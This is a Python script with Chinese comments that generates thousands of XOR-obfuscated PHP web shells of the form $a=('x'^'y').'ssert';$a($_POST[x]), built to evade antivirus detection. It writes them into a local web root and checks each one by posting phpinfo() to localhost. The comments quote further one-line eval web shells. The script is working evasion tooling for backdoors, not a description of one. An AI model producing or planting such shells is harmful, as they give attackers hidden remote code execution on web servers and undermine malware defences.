import requests,base64,time,sys,threading,queue #异或免杀 #<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?> #<?php @eval($_POST['hacker']);?> #!和@ 先各种转为ascll码,再各自转化为二进制,两者二进制异或结果,转化为ascll,最后转化为字符 #string 检测phpinfo是否执行成功 def string(): while not q.empty(): # 判断q不为空 filename=q.get() url = 'http://127.0.0.1:8080/x/' + filename datas = { 'x': 'phpinfo();' } result = requests.post(url, data=datas).content.decode('utf-8') if 'bingtang-PC' in result: print('check->'+filename+'->ok') else: print('check->'+filename+'->no') time.sleep(1) def shell_test_check(): url='http://127.0.0.1:8080/x/33xd64.php' datas = { 'x': 'phpinfo();' } result = requests.post(url, data=datas).content.decode('utf-8') print(result) if 'bingtang-PC' in result: print('ok') if __name__=="__main__": q = queue.Queue() # python queue模块的FIFO队列先进先出。 for i in range(1,127): #ASCLL从1到127 for ii in range(1,127): payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'" code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>" filename = str(i) + 'xd' + str(ii) + '.php' q.put(filename) with open('D:/phpstudy/WWW/x/' + filename, 'a') as f: f.write(code) f.close() print(filename + '文件生成成功') #多线程 for x in range(10): t=threading.Thread(target=string) t.start()